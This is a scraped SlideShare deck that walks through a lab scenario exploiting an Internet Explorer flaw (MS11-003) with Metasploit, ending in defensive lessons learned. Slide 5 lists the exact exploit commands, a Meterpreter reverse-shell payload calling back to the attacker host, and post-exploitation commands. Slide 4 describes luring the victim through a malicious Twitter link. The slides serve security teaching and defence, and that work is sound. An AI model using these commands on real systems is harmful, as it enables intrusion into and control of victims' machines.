SlideShare uma empresa Scribd logo

Metasploit Exploitation Scenarios -EN : Scenario 1

Transferir como KEY, PDF
Eric Romang
Eric Romang

First part of the Metasploit Exploitation Scenarios serie

Tecnologia
1 de 7
Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Recomendados

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 

Recomendados

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Computer securety
Computer securetyComputer securety
Computer securetyrushil ahmed
 
Cracking wep
Cracking wepCracking wep
Cracking wepPedro Guillén Núñez
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
Conficker
ConfickerConficker
ConfickerBobmathews
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Final Engagement
Final EngagementFinal Engagement
Final EngagementJefferson Green
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Linux router
Linux routerLinux router
Linux routerMiguel E Arellano Quezada
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 

Mais conteúdo relacionado

Mais procurados

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 

Mais procurados (9)

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionage
 
Computer securety
Computer securetyComputer securety
Computer securety
 
Cracking wep
Cracking wepCracking wep
Cracking wep
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key logger
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virus
 
Conficker
ConfickerConficker
Conficker
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability Infographic
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
 

Semelhante a Metasploit Exploitation Scenarios -EN : Scenario 1

metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresNioLemuelLazatinConc
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdfmeejuhaszjasmynspe52
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 

Semelhante a Metasploit Exploitation Scenarios -EN : Scenario 1 (20)

metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Final Engagement
Final EngagementFinal Engagement
Final Engagement
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Linux router
Linux routerLinux router
Linux router
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares Malwares
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 

Último

TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 

Último (20)

TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 

Metasploit Exploitation Scenarios -EN : Scenario 1

  • 1. Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
  • 2. Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
  • 3. Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
  • 4. Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
  • 5. Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
  • 6. Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
  • 7. Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Notas do Editor

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n